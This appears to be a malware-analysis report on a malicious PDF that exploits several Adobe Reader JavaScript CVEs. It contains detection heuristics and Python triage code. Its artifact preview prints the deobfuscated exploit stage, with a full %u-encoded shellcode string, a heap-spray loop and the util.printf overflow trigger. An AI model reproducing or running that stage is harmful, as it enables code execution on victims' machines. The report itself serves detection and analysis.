Verdict: MALICIOUS
Risk score: 616

Malware insights

MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 Command and Scripting Interpreter: JavaScript
The PDF carries an obfuscated JavaScript stream that targets several known Adobe Reader vulnerabilities: CVE-2009-4324 (media.newPlayer), CVE-2009-0927 (Collab.getIcon), CVE-2007-5659 (Collab.collectEmailInfo) and CVE-2008-2992 (util.printf). The recovered stage branches on app.viewerVersion, heap-sprays an embedded %u-encoded shellcode and then calls whichever sink matches the installed Reader version; that combination is what fires the PDF_JS_EXPLOIT_CLUSTER and PDF_ADOBE_READER_MULTI_CVE_JS_KIT heuristics. The shellcode opens with a short self-decoding stub, so what it does once it runs (for example fetching a second-stage payload) is not visible in the extracted script and would have to be confirmed from the decoded shellcode or a dynamic run.
Machine Learning
- Nyx PDF Classifier: malicious, score 1.0000
Heuristics (12)

- media.newPlayer — CVE-2009-4324 [critical; CVE match: exact; CVE_2009_4324]: PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(); it was exploited as a zero-day in December 2009. (Identified after JavaScript deobfuscation.)
- Collab.getIcon — CVE-2009-0927 [critical; CVE match: exact; CVE_2009_0927]: PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument and allows arbitrary code execution. (Identified after JavaScript deobfuscation.)
- Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE match: exact; CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by an over-long argument, typically a heap-sprayed message field, passed to Collab.collectEmailInfo(); one of a series of Acrobat JavaScript API exploits. (Identified after JavaScript deobfuscation.)
- util.printf — CVE-2008-2992 [critical; CVE match: exact; CVE_2008_2992]: PDF JavaScript calls util.printf(). CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by an over-long field-width format specifier; widely exploited in the wild after disclosure. (Identified after JavaScript deobfuscation.)
- Pidief-style multi-CVE JavaScript dispatcher [critical; CVE match: likely; PDF_PIDIEF_MULTI_CVE_DISPATCH]: A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires whichever CVE chain matches the Reader version opening the file.
- ClamAV: Pdf.Exploit.Agent-36086 [critical; CLAMAV_DETECTION]: ClamAV detects the submitted file as Pdf.Exploit.Agent-36086.
- Multi-CVE Adobe Reader JavaScript exploit kit [critical; PDF_ADOBE_READER_MULTI_CVE_JS_KIT]: One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than isolated API keywords: the PDF selects an old Reader vulnerability by viewer version and runs heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action [low; 3 related findings; PDF_JAVASCRIPT]: The PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical; PDF_JS_EXPLOIT_CLUSTER]: The PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content or a related CVE pattern. Benign form JavaScript on its own stays low-severity, but this correlated cluster is high-confidence malicious behaviour.
- Large comment-padded JavaScript eval stager [high; PDF_JS_LARGE_COMMENT_PADDED_EVAL]: The PDF JavaScript is a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and its recovered stage in noise, not normal PDF form automation.
- Embedded JS stream [low; PDF_JS]: The PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact [info; EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data or execution/download terms.
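A static triage routine in the spirit of the heuristics above, written for this page as an added example and not the analyzer's own code. It strips the block-comment padding, checks which of the four canonical Reader sinks are actually called, whether the script branches on app.viewerVersion, how many eval/unescape/fromCharCode stager tokens remain and whether a long run of %u escapes (shellcode carried in a JS string) is present, then tags the script the way the PDF_PIDIEF_MULTI_CVE_DISPATCH and PDF_JS_LARGE_COMMENT_PADDED_EVAL rules would. The sample script it runs on is constructed to have that shape and is not the page's artifact; the sink-to-CVE mapping is the public one the per-sink heuristics use; the thresholds (two sinks, 50 % comment padding, 16 consecutive escapes) are assumptions.

```python
import re

# Acrobat JavaScript sinks and the Adobe Reader CVE each one maps to (public mapping,
# the same one the per-sink heuristics in the report use).
SINK_CVES = {
    "Collab.collectEmailInfo": "CVE-2007-5659",
    "util.printf": "CVE-2008-2992",
    "Collab.getIcon": "CVE-2009-0927",
    "media.newPlayer": "CVE-2009-4324",
}

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# 16 or more consecutive %uXXXX escapes: at least 32 bytes of inline binary data.
UNICODE_ESCAPE_RUN = re.compile(r"(?:%u[0-9A-Fa-f]{4}){16,}")
STAGER_TOKENS = ("eval(", "unescape(", "String.fromCharCode(")


def strip_comment_padding(js):
    """Drop /* ... */ comments. Returns (cleaned_js, fraction of the input that was comment)."""
    cleaned = BLOCK_COMMENT.sub("", js)
    ratio = 1.0 - len(cleaned) / len(js) if js else 0.0
    return cleaned, ratio


def sink_calls(js):
    """Canonical sinks that are actually called (name followed by an opening parenthesis)."""
    return [s for s in SINK_CVES if re.search(re.escape(s) + r"\s*\(", js)]


def triage_acrobat_js(js):
    """Score one extracted Acrobat JavaScript stage; thresholds are assumptions."""
    cleaned, comment_ratio = strip_comment_padding(js)
    sinks = sink_calls(cleaned)
    finding = {
        "sinks": sinks,
        "cves": [SINK_CVES[s] for s in sinks],
        "version_gated": "app.viewerVersion" in cleaned,
        "stager_tokens": sum(cleaned.count(t) for t in STAGER_TOKENS),
        "comment_ratio": round(comment_ratio, 2),
        "unicode_escape_runs": len(UNICODE_ESCAPE_RUN.findall(cleaned)),
        "tags": [],
    }
    # Version switch plus two or more sinks: the Pidief-style per-version dispatcher.
    if finding["version_gated"] and len(sinks) >= 2:
        finding["tags"].append("MULTI_CVE_DISPATCHER")
    # Mostly comment by volume, with a fromCharCode/eval decoder left in the noise.
    if comment_ratio > 0.5 and "eval(" in cleaned and "String.fromCharCode(" in cleaned:
        finding["tags"].append("COMMENT_PADDED_EVAL_STAGER")
    # unescape() over a long %u run is how these kits build the sprayed shellcode.
    if finding["unicode_escape_runs"] and "unescape(" in cleaned:
        finding["tags"].append("UNESCAPE_SHELLCODE_SPRAY")
    return finding


# Constructed sample with the same shape as the recovered stage (comment padding around a
# decoder, a viewerVersion switch, several Reader sinks). It is not the page's artifact.
CONSTRUCTED_SAMPLE = "".join([
    "function d(s){ /*" + "x7Qk" * 200 + "*/ return eval(String.fromCharCode(115,112)); }\n",
    "var v = app.viewerVersion.toString();\n",
    'var sc = unescape("' + "%u9090" * 8 + "%u20EB%u8B5E" + "%u4141" * 8 + '");\n',
    "if (v < 8) { Collab.collectEmailInfo({msgid: sc, subj: sc}); }\n",
    'else if (v < 9) { util.printf("%45000f", 1e300); }\n',
    "else { Collab.getIcon(sc); }\n",
])

if __name__ == "__main__":
    for key, value in triage_acrobat_js(CONSTRUCTED_SAMPLE).items():
        print(f"{key}: {value}")
```

The point of stripping comments first is that the padding is what inflates the 625 KB stream; the sink and version checks are run on what remains, which is why a keyword hit on `util.printf` alone stays weak while the dispatcher tag requires the version switch as well.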
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0006_000.js | bed77171e472ddb92c7a53edb58514ddf49bc2706487f4bd1c4366cec5b4df46 | pdf-javascript-stream | PDF /JS object 6 at offset 0x143 | 625845 bytes |

Detection: ClamAV reports no threats for the carved stream on its own (the signature hit above is on the whole PDF). Obfuscation or payload: likely; the carved artifact contains 2 eval/decoder/string-building tokens and 42 long base64-like blobs, consistent with the random alphanumeric comment padding visible in the preview.
Preview (first 1,000 lines of the extracted script):
function clR(gY2){ /*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
... (truncated)
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| legacy_pdfkit_stage_000.js | 961ac2507b0594f329723ef4109c36d5c083ebf67a301ec653ff7cd83667e1ac | deobfuscated-js | comment-padded substitution-hex decoded JavaScript at offset 0x143 | 10413 bytes |

Detection: ClamAV reports no threats for the decoded stage on its own. Obfuscation or payload: likely; the carved artifact contains 12 eval/decoder/string-building tokens and 1 long base64-like blob.
Preview (first 1,000 lines of the extracted script):
function fix_it(yarsp,len)
{
while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE3FF%u470B%u8710%u77AA%uE310%uCC0B%uEF50%u3780%u4E0C%u3780%u6218%u47CF%u1CE7%uCCF4%u58FC%u4743%uE310%u4761%u6D78%u4945%u8BFC%uB993%uED9A%uA863%u03DE%u2F6B%u2923%u1C81%uDB78%uEB29%u8BF7%u0EE1%u0B9A%u9C63%uC09A%u2FE2%uAF4B%u9A11%u0F78%u449C%u0B1C%u4614%uE310%u4382%u603B%u43E0%u231B%uB67E%u8D78%u336E%u8B10%u2E7C%u8A7E%uB85F%uCB45%u1E52%u231B%uC304%uE3E8%u470B%u139B%u1FB0%uE310%u2D0B%u8B10%u0322%uB4F8%u0E63%uECFD%u2F75%uA89B%u18E8%u03F8%u470B%u6A10%u6C0F%u0893%u4C0F%u96D0%uCAFA%uE395%u4709%uB310%uB863%uE310%uB80B%uD745%uC286%uE710%u470B%u8940%u2D0B%u6E10%u478E%uE312%u170B%uB6EF%uCA33%uE3A5%u470F%u4F10%u8701%u1865%u8045%uCD16%u3F6E%u2475%u434D%uE310%u470B%u669D%u430B%uE310%u8E38%uB341%u12F4%uA32C%uC304%uE390%u470B%u6A58%u0B4E%uE378%u474B%u8910%uB84B%uAB45%u8700%u8D64%u0282%u8970%u2D0B%u8910%u2D0B%u8910%uB80B%uB345%u8700%uB964%u4761%uE378%u470B%u8914%u2D0B%u0A10%u47A1%uE310%uB85B%uB745%u8700%uA164%u0282%u6E78%u234E%u8B40%u070B%uE310%u32F4%u1C70%u2F7E%uB6EF%u4C53%u97D0%uCC1E%u8755%u8700%uED64%u32F4%u1C74%u277E%u96EF%uB847%uA345%u92E0%u96EF%uB847%uA745%u8E20%uB251%uC286%uE710%u470B%u1C40%u6B5E%u1C7A%u12F4%uB620%uAB80%u9E9B%u4C03%u97EF%u1440%u3D9B%uCC5D%uDF63%u3380%u9B23%uB408%u6846%u677D%u1013%u8E38%uA259%u44A6%uB5D3%uB138%u5D1F%u7F1B%u97C6%u8603%uEEDE%uB508%u0850%u7CFA%uBDEE%uA27E%u684A%uCCE0%uC74A%u9A08%u6876%u0C07%uB99B%u4417%u68CD%uCC0F%u2613%u1C55%uE1FB%u8738%u214D%u470F%uB2F8%uB8F4%u8BEF%u337F%uD960%u6824%u9071%u2662%u937E%u3564%u977E%u2E79%uCD60%u2868%uCC7D%u357F%u8771%u686E%u802F%u7636%u9036%u2362%u852D%u7632%u8728%u216F%uDA22%u253D%uD726%u2332%u8073%u223E%u8524%u2532%uD772%u7338%u8229%u223A%uC526%u7A78%uE323%u470B%u0010");
var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock=nop+payload;
var bigblock=unescape("%u0A0A%u0A0A");
var headersize=20;
var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);
var block=bigblock.substring(0,bigblock.length-spray);
while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();
for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);
}
function collab_email()
{
var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE3FF%u470B%u8710%u77AA%uE310%uCC0B%uEF50%u3780%u4E0C%u3780%u6218%u47CF%u1CE7%uCCF4%u58FC%u4743%uE310%u4761%u6D78%u4945%u8BFC%uB993%uED9A%uA863%u03DE%u2F6B%u2923%u1C81%uDB78%uEB29%u8BF7%u0EE1%u0B9A%u9C63%uC09A%u2FE2%uAF4B%u9A11%u0F78%u449C%u0B1C%u4614%uE310%u4382%u603B%u43E0%u231B%uB67E%u8D78%u336E%u8B10%u2E7C%u8A7E%uB85F%uCB45%u1E52%u231B%uC304%uE3E8%u470B%u139B%u1FB0%uE310%u2D0B%u8B10%u0322%uB4F8%u0E63%uECFD%u2F75%uA89B%u18E8%u03F8%u470B%u6A10%u6C0F%u0893%u4C0F%u96D0%uCAFA%uE395%u4709%uB310%uB863%uE310%uB80B%uD745%uC286%uE710%u470B%u8940%u2D0B%u6E10%u478E%uE312%u170B%uB6EF%uCA33%uE3A5%u470F%u4F10%u8701%u1865%u8045%uCD16%u3F6E%u2475%u434D%uE310%u470B%u669D%u430B%uE310%u8E38%uB341%u12F4%uA32C%uC304%uE390%u470B%u6A58%u0B4E%uE378%u474B%u8910%uB84B%uAB45%u8700%u8D64%u0282%u8970%u2D0B%u8910%u2D0B%u8910%uB80B%uB345%u8700%uB964%u4761%uE378%u470B%u8914%u2D0B%u0A10%u47A1%uE310%uB85B%uB745%u8700%uA164%u0282%u6E78%u234E%u8B40%u070B%uE310%u32F4%u1C70%u2F7E%uB6EF%u4C53%u97D0%uCC1E%u8755%u8700%uED64%u32F4%u1C74%u277E%u96EF%uB847%uA345%u92E0%u96EF%uB847%uA745%u8E20%uB251%uC286%uE710%u470B%u1C40%u6B5E%u1C7A%u12F4%uB620%uAB80%u9E9B%u4C03%u97EF
... (truncated)
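Two pieces of the deobfuscated stage are worth reproducing numerically, as an added example written for this page rather than code from the sample: how the data in unescape("%u...") is laid out in memory, and how much memory util_printf()'s spray loop actually commits. The payload prefix below is the first nine escapes of the stage's payload string, copied from the preview; the spray constants (four-unit NOP prefix, headersize 20, 0x40000 growth target, 1400 array slots) are the ones in util_printf(). Reading the first decoded bytes as a get-PC prologue is the editor's interpretation of the bytes, not something the report states.

```python
import re

ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# First nine escapes of util_printf()'s payload string, copied from the preview above.
# The rest of the string is deliberately left out here.
SAMPLE_PREFIX = "%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3"


def js_unescape_bytes(s):
    """Return the bytes a JS unescape() result occupies in memory.

    The JS engine stores strings as 16-bit code units, so %uXXXX becomes the two
    bytes of XXXX in little-endian order, and %XX or a literal character becomes
    the unit XX 00. That layout is what the heap spray relies on.
    """
    out = bytearray()
    pos = 0
    for m in ESCAPE.finditer(s):
        for ch in s[pos:m.start()]:
            out += ord(ch).to_bytes(2, "little")
        if m.group(1) is not None:
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out += bytes([int(m.group(2), 16), 0])
        pos = m.end()
    for ch in s[pos:]:
        out += ord(ch).to_bytes(2, "little")
    return bytes(out)


def decode_sample_prefix():
    # Decodes to 90 90 90 90 90 90 EB 20 5E 8B ...: a NOP sled, then jmp short +0x20 /
    # pop esi, the usual get-PC prologue of a self-decoding stub (editor's reading).
    return js_unescape_bytes(SAMPLE_PREFIX)


def spray_layout(payload_units, nop_units=4, header_units=20, target=0x40000, blocks=1400):
    """Reproduce util_printf()'s spray arithmetic in 16-bit code units (1 unit = 2 bytes).

    Defaults are the constants used in the stage above: nop = "%u0A0A" x4,
    headersize = 20, a 0x40000-unit growth target and 1400 array slots.
    """
    heapblock = nop_units + payload_units      # heapblock = nop + payload
    spray = header_units + heapblock           # spray = headersize + heapblock.length
    bigblock = 2                               # unescape("%u0A0A%u0A0A") is 2 units
    while bigblock < spray:                    # while(bigblock.length<spray){bigblock+=bigblock;}
        bigblock *= 2
    fillblock = spray                          # bigblock.substring(0, spray)
    block = bigblock - spray                   # bigblock.substring(0, bigblock.length - spray)
    while block + spray < target:              # block = block + block + fillblock
        block = block + block + fillblock
    slot_units = block + heapblock             # mem_array[i] = block + heapblock
    total_bytes = slot_units * 2 * blocks
    return {
        "slot_units": slot_units,
        "slot_bytes": slot_units * 2,
        "total_bytes": total_bytes,
        # The filler is 0x0A bytes; a hijacked pointer of 0x0A0A0A0A can only land in the
        # spray if the spray extends past that address, so this is a necessary condition.
        "covers_0x0A0A0A0A": total_bytes > 0x0A0A0A0A,
    }


if __name__ == "__main__":
    print(decode_sample_prefix().hex(" "))
    print(spray_layout(len(SAMPLE_PREFIX) // 6))
```

With even a nine-unit payload each array slot is about 512 KB and the 1400 slots total roughly 734 MB, far beyond 0x0A0A0A0A (about 168 MB); the 0x0A filler is chosen so that a corrupted pointer with that value both lands inside the spray and executes as harmless two-byte `or` instructions until the sled reaches the stub.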